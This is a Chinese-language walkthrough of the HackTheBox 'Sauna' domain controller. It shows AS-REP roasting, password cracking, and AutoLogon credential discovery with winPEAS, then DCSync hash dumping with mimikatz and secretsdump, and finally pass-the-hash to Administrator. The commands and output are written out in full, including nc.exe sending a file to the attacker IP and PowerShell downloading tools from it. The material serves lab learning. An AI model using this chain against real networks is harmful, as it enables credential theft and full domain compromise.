免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用，请不要将文中使用的工具和渗透思路用于任何非法用途，对此产生的一切后果，本人不承担任何责任，也不对造成的任何误用或损害负责

服务探测

端口发现

┌──(root💀kali)-[~/htb/Sauna]
└─# nmap -p- -Pn 10.10.10.175 --open
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:23 EST
Nmap scan report for 10.10.10.175
Host is up (0.26s latency).
Not shown: 65515 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49697/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1192.54 seconds

详细端口信息

──(root💀kali)-[~/htb/Sauna]
└─# nmap -Pn -sV -A -O 10.10.10.175 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49686,49697
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:45 EST
Nmap scan report for 10.10.10.175
Host is up (0.26s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-03 22:45:17Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     adws?
| fingerprint-strings: 
|   DNSStatusRequestTCP, Kerberos, SMBProgNeg, afp, oracle-tns: 
|_    Ihttp://schemas.microsoft.com/ws/2006/05/framing/faults/UnsupportedVersion
49667/tcp open     msrpc         Microsoft Windows RPC
49673/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open     msrpc         Microsoft Windows RPC
49677/tcp open     msrpc         Microsoft Windows RPC
49686/tcp filtered unknown
49697/tcp open     msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9389-TCP:V=7.91%I=7%D=1/3%Time=61D30C0C%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequestTCP,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/fra
SF:ming/faults/UnsupportedVersion")%r(Kerberos,4B,"\x08Ihttp://schemas\.mi
SF:crosoft\.com/ws/2006/05/framing/faults/UnsupportedVersion")%r(SMBProgNe
SF:g,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/framing/faults/Uns
SF:upportedVersion")%r(oracle-tns,4B,"\x08Ihttp://schemas\.microsoft\.com/
SF:ws/2006/05/framing/faults/UnsupportedVersion")%r(afp,4B,"\x08Ihttp://sc
SF:hemas\.microsoft\.com/ws/2006/05/framing/faults/UnsupportedVersion");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-01-03T22:46:21
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   253.57 ms 10.10.14.1
2   254.12 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.12 seconds

有DNS，kerberos和ldap，显然这是一台DC服务器。

枚举域名

┌──(root💀kali)-[~/htb/Sauna]
└─# crackmapexec smb 10.10.10.175 -u 'anonymous' -p '' --shares                                 
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] EGOTISTICAL-BANK.LOCAL\anonymous: STATUS_LOGON_FAILURE 

得到一个域名：EGOTISTICAL-BANK.LOCAL

枚举了一大轮，拿不到任何有用的东西。无法打开smb分享目录，也不知道任何有用的用户名。

Kerberos

使用nmap枚举kerberos的用户名

──(root💀kali)-[~/htb/Sauna]
└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/usr/share/wordlists/SecLists/Usernames/cirt-default-usernames.txt 10.10.10.175
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 07:03 EST
Nmap scan report for 10.10.10.175
Host is up (0.30s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|     ADMINISTRATOR@EGOTISTICAL-BANK.LOCAL
|     Administrator@EGOTISTICAL-BANK.LOCAL
|_    administrator@EGOTISTICAL-BANK.LOCAL

Nmap done: 1 IP address (1 host up) scanned in 41.32 seconds

看见只有一个administrator的用户名，这个显然目前我们是没有权限的

80端口的http服务看起来像是一个公司的介绍网页，尝试制作一份user名单

cewl -d 1 -m 3 -w user.txt 10.10.10.175

再用制作成的名单枚举kerberos的用户名

┌──(root💀kali)-[~/htb/Sauna]
└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/root/htb/Sauna/user.txt 10.10.10.175
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 08:00 EST
Nmap scan report for 10.10.10.175
Host is up (0.30s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|_    sauna@EGOTISTICAL-BANK.LOCAL

Nmap done: 1 IP address (1 host up) scanned in 16.22 seconds

得到一个新的用户名sauna

web

在about us页面暴露出了team member的名字，手动制作一个用户名字典
把我们上面找到的两个kerberos的用户名也加上这个字典

┌──(root💀kali)-[~/htb/Sauna]
└─# cat user
Fergus Smith
Fergus
Smith
Fergus.Smith
FergusSmith
Fergus.S
fsmith
Shaun Coins
Shaun
Coins
Shaun.Coins
ShaunCoins
Shaun.C
scoins
Hugo Bear
Hugo
Bear
Hugo.Bear
HugoBear
Hugo.B
hbear
Bowie Taylor
Bowie
Taylor
Bowie.Taylor
BowieTaylor
Bowie.T
btaylor
Sophie Driver
Sophie
Driver
Sophie.Driver
SophieDriver
Sophie.D
sdriver
Steven Kerb
Steven
Kerb
Steven.Kerb
StevenKerb
Steven.K
skerb
sauna
administrator

使用GetNPUsers.py尝试向kerberos请求不需要预认证的票据

hacktricks里的解释:

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

┌──(root💀kali)-[~/htb/Sauna]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/htb/Sauna/user  -outputfile hashes.asreproast -dc-ip 10.10.10.175

可以看到拿到一个fsmith的票据

┌──(root💀kali)-[~/htb/Sauna]
└─# cat hashes.asreproast 
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:85853ae8057c9c84f1ae5e3860cfcf35$29c704dfe2ce770414e478fcb530171c1b749dce35187d79c2679d93eaa6d2f5cd068123b2e4bbe3f59a94c1e589aa494ab81aa8d5c5c4d0bfdfa7a77320c3651f69e58550327e188e1b551f4d7d5a85fd0d541793c37e1908197d535f32ac12442756f3d5264610f155bcf1f341b29fa07234aaf7cd10a74c8fea80dddf6a8f5364633faf65313b81401888d24115e8c1bdb6fa2b45cf88b95c7f0b02f64cdf3ac44eb71fca52b9c187fa91bbcc9bd743ea59b8625abb2e8c94e632df4f3e2a8d50ed035e8b796e1ee1d57b1d6d85b4813af2b76c2af16da1ac9b2880f20c2afdac285dc57c200595de6d22df40eba458438d6b3082b3a66bebeeea0e04aacc

john破解

┌──(root💀kali)-[~/htb/Sauna]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:10 DONE (2022-01-03 10:33) 0.09775g/s 1030Kp/s 1030Kc/s 1030KC/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

foodhold

拿到一个用户凭证：fsmith:Thestrokes23

使用evil-winrm登录，拿到foodhold和user.txt

┌──(root💀kali)-[~/htb/Sauna]
└─# evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith

提权

传winpeas和nc到靶机：
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/winPEASx64.exe','C:\Users\FSmith\Desktop\winPEASx64.exe')"

执行winpea,重定向到o.txt：

&{C:\Users\FSmith\Desktop\winPEASx64.exe} > o.txt

poweshell利用nc.exe传送文件

接收
nc -nlvp 4444 > o.txt

传送
Get-Content o.txt | .\nc.exe -w 3 10.10.16.3 4444 | tee test.log

发现一个用户密码

???????????? Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

查看靶机的用户

*Evil-WinRM* PS C:\> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

用evil-winrm登录到svc_loanmgr，查看用户信息信息

*Evil-WinRM* PS C:\> net users svc_loanmgr
User name                    svc_loanmgr
Full Name                    L Manager
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/24/2020 3:48:31 PM
Password expires             Never
Password changeable          1/25/2020 3:48:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

看到svc_loanmgr在Remote Management Use组

查看这个组的解释

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
FSmith
svc_loanmgr
The command completed successfully.

好像就是一个远程访问组。

我们尝试使用DCSync攻击尝试窃取用户哈希

关于DCSync，hacktricks上是这样解释的：

1. The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.

2. By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.

3. If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text

默认有权限执行DCSync的用户组是：Domain Admins, Enterprise Admins, Administrators, and Domain Controllers

把mimikatz.exe从kali传到靶机：

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/mimikatz.exe','C:\Users\svc_loanmgr\Documents\mimikatz.exe')"

执行下面命令触发DC同步

mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit

可以看见导出了用户的哈希

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ./mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv
[DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] Exporting domain 'EGOTISTICAL-BANK.LOCAL'
502     krbtgt  4a8899428cad97676ff802229e466e2c        514
1103    HSmith  58a52d36c84fb7f5f1beab9a201db1dd        66048
1000    SAUNA$  230699e71e07d687981fc0685082b5cc        532480
500     Administrator   823452073d75b9d1cf70ebdf86c7f98e        66048
1105    FSmith  58a52d36c84fb7f5f1beab9a201db1dd        4260352
1108    svc_loanmgr     9cb31797c39a9b170b04058ba2bba48c        66048

mimikatz(commandline) # exit
Bye!

利用evil-winrm,使用哈希密码直接登录到Administrator（pass-the-hash）

┌──(root💀kali)-[~/htb/Sauna]
└─# evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175

Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                 

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                                   

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator

总结

通过web页面展示的信息，我们猜测到了一个用户名
使用GetNPUsers.py尝试向kerberos请求不需要预认证的票据，我们因此拿到了foodhold
使用winpeas，我们枚举到了另外一个用户的明文凭证，因此我们可以提权到svc_loanmgr
利用DCSync拿到管理员的哈希密码，从而提权到administrator

补充

secretsdump.py

拿到svc_loanmgr的凭证以后使用secretsdump.py也可以爆出其他用户的哈希密码，原理也是DCSync：

┌──(root💀kali)-[~/htb/Sauna]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround\\!@10.10.10.175
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:230699e71e07d687981fc0685082b5cc:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:8dccc32df17c3189f01f7702e6198f9a01199229d04420d830bca8dc8a1b483e
SAUNA$:aes128-cts-hmac-sha1-96:a2927c8ea3e312d65894d9b1e508931f
SAUNA$:des-cbc-md5:7c2c156d022c0131
[*] Cleaning up... 

如何知道本账号是否有权限使用DCSync？

把PowerView.ps1下载到本地

登录到靶机

┌──(root💀kali)-[~/htb/Sauna]
└─# evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -s '/root/PowerSploit/Recon'

引入PowerView.ps1

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> PowerView.ps1

检查svc_loanmgr和Fsmith的域权限

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}


InheritedObjectType   : All
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType            : All
IdentityReference     : EGOTISTICALBANK\FSmith
IsInherited           : False
ActiveDirectoryRights : ReadProperty, GenericExecute
PropagationFlags      : None
ObjectFlags           : None
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766

/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated
InheritedObjectType   : All
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType            : All
IdentityReference     : EGOTISTICALBANK\svc_loanmgr
IsInherited           : False
ActiveDirectoryRights : ReadProperty, GenericExecute
PropagationFlags      : None
ObjectFlags           : None
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766

InheritedObjectType   : All
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType            : DS-Replication-Get-Changes
IdentityReference     : EGOTISTICALBANK\svc_loanmgr
IsInherited           : False
ActiveDirectoryRights : ExtendedRight
PropagationFlags      : None
ObjectFlags           : ObjectAceTypePresent
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766

InheritedObjectType   : All
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType            : DS-Replication-Get-Changes-All
IdentityReference     : EGOTISTICALBANK\svc_loanmgr
IsInherited           : False
ActiveDirectoryRights : ExtendedRight
PropagationFlags      : None
ObjectFlags           : ObjectAceTypePresent
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766

留意ObjectType里显示svc_loanmgr拥有DS-Replication-Get-Changes和DS-Replication-Get-Changes-All
表明用户可以使用DCSync，参考这篇文章

另外，也可以通过bloodhound查看当前账号在域中的权限，也可以查看到是否有DCSync权限。

关于上传下载

这个我是看IppSec的视频才知道的，evil-winrm登录以后可以直接通过upload和download命令上传下载文件，唔，原理如此方便，涨姿势了-_-！